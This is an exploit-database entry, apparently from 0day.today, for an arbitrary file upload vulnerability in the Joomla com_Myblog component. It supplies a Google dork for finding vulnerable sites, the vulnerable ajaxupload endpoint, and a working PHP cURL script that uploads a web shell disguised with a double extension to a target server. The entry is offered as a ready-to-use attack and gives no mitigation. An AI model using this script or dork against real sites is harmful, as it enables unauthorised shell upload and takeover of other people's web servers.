Joomla com_Myblog Arbitrary File Upload Vulnerability

2015-07-20T00:00:00
ID 1337DAY-ID-23901
Type zdt
Reporter Back-DOOR
Modified 2015-07-20T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [+]   Title : Joomla com_Myblog Exploit Arbitrary File Upload Vulnerability 


----------------------------------------------------

[+]   Author  : Back-DOOR

----------------------------------------------------
[+]   Exploit by   :   Back-DOOR

[+]   Dork google   :  inurl:/components/com_myblog/
----------------------------------------------------

[+]   Contact  :  https://facebook.com/Backdoor.ma
[+]   Like  :  https://fb.com/BaCkDoOr.HaCkInG
[+]   youtube chaine : https://www.youtube.com/user/BackDOOR8100/videos


exploit Vul : /index.php?option=com_myblog&task=ajaxupload


Vuln code : {error: 'No file has been uploaded.', msg: '' }


Exploiter :D :
***************************************************************************************************
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
***************************************************************************************************


#  0day.today [2018-01-04]  #